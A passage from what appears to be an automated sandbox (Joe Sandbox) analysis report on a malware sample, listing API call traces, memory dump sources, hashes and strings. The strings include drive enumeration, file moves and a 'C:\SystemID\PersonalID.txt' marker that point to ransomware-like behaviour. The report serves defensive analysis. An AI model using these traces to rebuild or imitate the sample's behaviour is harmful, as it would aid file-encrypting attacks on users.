                                                                                                  APIs
                                                                                                  • __getenv_helper_nolock.LIBCMT ref: 004B1726
                                                                                                  • _strlen.LIBCMT ref: 004B1734
                                                                                                    • Part of subcall function 00495208: __getptd_noexit.LIBCMT ref: 00495208
                                                                                                  • _strnlen.LIBCMT ref: 004B17BF
                                                                                                  • __lock.LIBCMT ref: 004B17D0
                                                                                                  • __getenv_helper_nolock.LIBCMT ref: 004B17DB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2168648987-0
                                                                                                  • Opcode ID: 06da98297038a4c2d0b497ddda1f23616651a13c373e7d6205d6115785ee2bde
                                                                                                  • Instruction ID: 2198fdf7f6cb1b7e3041c0d6e4aa61aa963a00a6e99e9a6b26c2b0763f602b63
                                                                                                  • Opcode Fuzzy Hash: 06da98297038a4c2d0b497ddda1f23616651a13c373e7d6205d6115785ee2bde
                                                                                                  • Instruction Fuzzy Hash: 2B312632941215ABDF216BB9CC51BEF3B94AF01B24F60006BF814DB291DE7C880147BD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetLogicalDrives.KERNEL32 ref: 00480A75
                                                                                                  • SetErrorMode.KERNEL32(00000001,00570234,00000002), ref: 00480AE2
                                                                                                  • PathFileExistsA.SHLWAPI(?), ref: 00480AF9
                                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00480B02
                                                                                                  • GetDriveTypeA.KERNEL32(?), ref: 00480B1B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                  • String ID:
                                                                                                  • API String ID: 2560635915-0
                                                                                                  • Opcode ID: c4e1198cec71a3792b7b5740d5a33b19a9225c5af03b72f2eca9f7f54387a5fd
                                                                                                  • Instruction ID: 89edb86d606c4510172da3aa406295a7654e810768042f194cb9acf1f434f49d
                                                                                                  • Opcode Fuzzy Hash: c4e1198cec71a3792b7b5740d5a33b19a9225c5af03b72f2eca9f7f54387a5fd
                                                                                                  • Instruction Fuzzy Hash: 5C41BE711083409FC710EFA8C895B1FBBE4BB95718F500E2EF485A22A2D7B9D548CB96
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __amsg_exit$__cinit__wsetenvp__wwincmdln_doexit
                                                                                                  • String ID:
                                                                                                  • API String ID: 2587630013-0
                                                                                                  • Opcode ID: ff9004b86f28ef2d53b8ad74104a238047fa62bd8811c8a377b8b42d45897fab
                                                                                                  • Instruction ID: 6e04096d80d17bcaa3f2b8a71cf45a7fc3158ea15067e3bc801940c623dc1ba4
                                                                                                  • Opcode Fuzzy Hash: ff9004b86f28ef2d53b8ad74104a238047fa62bd8811c8a377b8b42d45897fab
                                                                                                  • Instruction Fuzzy Hash: BFF0FF20A0A312A8DF3173B79916B9F1E545F9276CF20057FF700A61C3DE9C890283AE
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                  • String ID:
                                                                                                  • API String ID: 2974526305-0
                                                                                                  • Opcode ID: 4ae49f209f6475a8200da9094bd174a6e7cf262bc7a48cefe5d20c6bfdcbc766
                                                                                                  • Instruction ID: 356070d523c0dafb5a5b6451408df627323b2fc91907964de3aa0fd12f6868bc
                                                                                                  • Opcode Fuzzy Hash: 4ae49f209f6475a8200da9094bd174a6e7cf262bc7a48cefe5d20c6bfdcbc766
                                                                                                  • Instruction Fuzzy Hash: D751B530A00705BBCF249FA98A4156F7FB1AF01324F24877FE825963D0D7B89D518B49
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,00000000,?,?), ref: 0047F125
                                                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 0047F198
                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000), ref: 0047F1A1
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0047F1A8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1421093161-0
                                                                                                  • Opcode ID: b34c37fe4169c9e8e1b382cfed4a62a2d05b9de1b614c10a2e1e0d8d7126863d
                                                                                                  • Instruction ID: 6cecf51b5f8855f5275a5b5c582745f491cc1acd8ebc1bdfc23f64073eeb1cc2
                                                                                                  • Opcode Fuzzy Hash: b34c37fe4169c9e8e1b382cfed4a62a2d05b9de1b614c10a2e1e0d8d7126863d
                                                                                                  • Instruction Fuzzy Hash: DB31F536900104EBDB14AF68CC4ABEF7B78EB05704F508129F91567281D7796A49CBA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetUserNameW.ADVAPI32(?,?), ref: 0048B1BA
                                                                                                    • Part of subcall function 004811C0: CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 0048120F
                                                                                                    • Part of subcall function 004811C0: GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00481228
                                                                                                    • Part of subcall function 004811C0: CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0048123D
                                                                                                    • Part of subcall function 004811C0: MoveFileW.KERNEL32(00000000,?), ref: 00481277
                                                                                                    • Part of subcall function 0048BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0048BA4A
                                                                                                    • Part of subcall function 0048BA10: RegisterClassExW.USER32(00000030), ref: 0048BA73
                                                                                                    • Part of subcall function 0048BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0048BAAD
                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0048B4B3
                                                                                                  • TranslateMessage.USER32(?), ref: 0048B4CD
                                                                                                  • DispatchMessageW.USER32(?), ref: 0048B4D7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                  • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                  • API String ID: 441990211-897913220
                                                                                                  • Opcode ID: d92470579b2d4b34c143cf0f17d1d5aace07209a06346c182532f4dd13167265
                                                                                                  • Instruction ID: ceae34cc160bca0a0519e593f8121a2894a75fdb6d7e6cad04778860d0fa4be3
                                                                                                  • Opcode Fuzzy Hash: d92470579b2d4b34c143cf0f17d1d5aace07209a06346c182532f4dd13167265
                                                                                                  • Instruction Fuzzy Hash: F45187315142449BC718FF61C9929EFB7E8BF54708F404C2EF44A43162EF78AA09CBA6
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _fputws$CreateDirectory
                                                                                                  • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                  • API String ID: 2590308727-54166481
                                                                                                  • Opcode ID: 67bb0c396a17d091ace4d3bb00f805c1deaf38b0a27cee5cc75fced8f66dd946
                                                                                                  • Instruction ID: 5a80ebe93870df3d78fa042b7cdfd7cad2ce8a3c748ee09364d98f1aeac4faf0
                                                                                                  • Opcode Fuzzy Hash: 67bb0c396a17d091ace4d3bb00f805c1deaf38b0a27cee5cc75fced8f66dd946
                                                                                                  • Instruction Fuzzy Hash: DF11D0B2D00305ABCF60DF689C8539E7BA0BF10319F00492FE95D52251E37A9A148BCA
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __flush__getptd_noexit__lock_file__write
                                                                                                  • String ID:
                                                                                                  • API String ID: 1331135983-0
                                                                                                  • Opcode ID: ef29d93376fe84331570acb379b7abde29aff2c498f00651cb78edf816b0df4e
                                                                                                  • Instruction ID: addd0a30c7812d1fd38296ee90fd7cddd7111dd791046a289346f8e37921dfbf
                                                                                                  • Opcode Fuzzy Hash: ef29d93376fe84331570acb379b7abde29aff2c498f00651cb78edf816b0df4e
                                                                                                  • Instruction Fuzzy Hash: 8611A732501F105EDE255B799C4376E3F50AF42B38F24836FE4759A2C1CB2CAA43975A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 00493B64
                                                                                                    • Part of subcall function 00490C62: __FF_MSGBANNER.LIBCMT ref: 00490C79
                                                                                                    • Part of subcall function 00490C62: __NMSG_WRITE.LIBCMT ref: 00490C80
                                                                                                    • Part of subcall function 00490C62: RtlAllocateHeap.NTDLL(01320000,00000000,00000001,00000001,?,?,?,004A0E81,00000001,00000000,?,?,?,004A0D1A,004BF284,?), ref: 00490CA5
                                                                                                  • std::exception::exception.LIBCMT ref: 00493B82
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00493B97
                                                                                                    • Part of subcall function 004A0ECA: RaiseException.KERNEL32(?,?,004BF299,?,?,?,?,?,?,?,004BF299,?,00578238,?), ref: 004A0F1F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                  • String ID:
                                                                                                  • API String ID: 3074076210-0
                                                                                                  • Opcode ID: 0af72648f214760d8b5bdaf75dfca254be3151a5bcd30127d21e9aebabed337c
                                                                                                  • Instruction ID: b5b3dc55e9f1594567889a77e28d9bf0bc64232cb6e9c2991665fc46412ee20e
                                                                                                  • Opcode Fuzzy Hash: 0af72648f214760d8b5bdaf75dfca254be3151a5bcd30127d21e9aebabed337c
                                                                                                  • Instruction Fuzzy Hash: AAF0F43180420D66CF00AEA9EC56DDE7FE8EF02319F00447BF80496282DBB4AA5082D8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00485FE2
                                                                                                    • Part of subcall function 00493B4C: _malloc.LIBCMT ref: 00493B64
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                  • String ID: vector<T> too long
                                                                                                  • API String ID: 657562460-3788999226
                                                                                                  • Opcode ID: f6d3f07a0e9097ea2ba65b220face03b5e65af0415f2670e0b8fa98b0ad9effa
                                                                                                  • Instruction ID: 7932f6d7f74923039a3d2c81bb2ed5e9c982e708e18fcda0374078f1e8c6dbc0
                                                                                                  • Opcode Fuzzy Hash: f6d3f07a0e9097ea2ba65b220face03b5e65af0415f2670e0b8fa98b0ad9effa
                                                                                                  • Instruction Fuzzy Hash: 2811E6755005089BCF04EF1CD9818AABBE9EF84310704856EEE098F70AEB35ED25CBA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00483B0A
                                                                                                    • Part of subcall function 00493B4C: _malloc.LIBCMT ref: 00493B64
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                  • String ID: vector<T> too long
                                                                                                  • API String ID: 657562460-3788999226
                                                                                                  • Opcode ID: 30eab8f203e8733a78211114e8231964144340dcd924f9eaf3b1057467ba4b57
                                                                                                  • Instruction ID: 6e54b4c675aa502c07cbda9fa652bbb1e82fac8fd5fe36f8e79c08ea9ac176f2
                                                                                                  • Opcode Fuzzy Hash: 30eab8f203e8733a78211114e8231964144340dcd924f9eaf3b1057467ba4b57
                                                                                                  • Instruction Fuzzy Hash: 34012471100705ABD720EF9CC49068BF7E8AF80B25F20893FEA5983341E7B5E904C794
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 004C4AE0: GetStdHandle.KERNEL32(000000F4,004C4C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,004C480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,004C1D37,00000000,0047CDAE,00000001,00000001), ref: 004C4AFA
                                                                                                    • Part of subcall function 004C4AE0: GetFileType.KERNEL32(00000000), ref: 004C4B05
                                                                                                    • Part of subcall function 004C4AE0: __vfwprintf_p.LIBCMT ref: 004C4B27
                                                                                                  • _raise.LIBCMT ref: 004C4C18
                                                                                                    • Part of subcall function 0049A12E: __getptd_noexit.LIBCMT ref: 0049A16B
                                                                                                    • Part of subcall function 00497CEC: _doexit.LIBCMT ref: 00497CF6
                                                                                                  Strings
                                                                                                  • %s(%d): OpenSSL internal error, assertion failed: %s, xrefs: 004C4C0C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileHandleType__getptd_noexit__vfwprintf_p_doexit_raise
                                                                                                  • String ID: %s(%d): OpenSSL internal error, assertion failed: %s
                                                                                                  • API String ID: 2149077303-4210838268
                                                                                                  • Opcode ID: c55549b3b20fddb907acb890c857fe0d798ab8aec16d78c3a716b9c5127bcc7a
                                                                                                  • Instruction ID: c977747545d16280177d299e2f658318d9d2f18ad0ca8e22ba267e416b5b150b
                                                                                                  • Opcode Fuzzy Hash: c55549b3b20fddb907acb890c857fe0d798ab8aec16d78c3a716b9c5127bcc7a
                                                                                                  • Instruction Fuzzy Hash: 8BD05E390882007FED012791AC07E4A7E61AF8871CF40882CF69E000A2C7768130A75B
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
